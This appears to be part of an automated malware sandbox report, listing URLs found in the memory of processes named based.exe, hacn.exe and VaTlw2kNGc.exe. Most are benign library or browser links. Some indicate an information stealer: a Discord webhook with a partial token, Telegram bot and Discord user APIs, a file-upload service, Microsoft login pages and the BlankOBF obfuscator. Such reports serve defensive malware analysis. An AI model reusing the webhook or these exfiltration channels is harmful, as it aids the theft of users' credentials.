Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr;r
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot%s/%s
Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: based.exe, 00000008.00000003.1751478048.00000273ED2C1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1751208630.00000273ED49F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752076948.00000273ED2E4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753162300.00000273ED2E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: VaTlw2kNGc.exe, 00000001.00000002.1717549435.000001A220B58000.00000004.00001000.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748492866.000001A051C7C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920S
Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: based.exe, 00000008.00000002.2383767795.00000273EE514000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: based.exe, 00000008.00000002.2383767795.00000273EE52C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp, based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.git
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png
Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz
Source: based.exe, 00000006.00000003.1736031056.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: based.exe, 00000008.00000003.1856585098.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1823417228.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868829846.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8F2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1819669283.00000273ED8F3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1784489237.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1793559715.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: based.exe, 00000008.00000003.2258916763.00000273ED8FD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: based.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: based.exe, 00000008.00000003.2259259730.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259677546.00000273EDA49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: based.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: based.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: based.exe, 00000008.00000002.2381267066.00000273EDAE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse=Lax0
Source: based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: based.exe, 00000008.00000002.2381451502.00000273EDCD8000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1856585098.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1914578038.00000273ED8B8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2383255606.00000273EE17D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2259259730.00000273ED8B8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1823417228.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868829846.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1911931520.00000273EE17E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8F2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1819669283.00000273ED8F3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1784489237.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1793559715.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
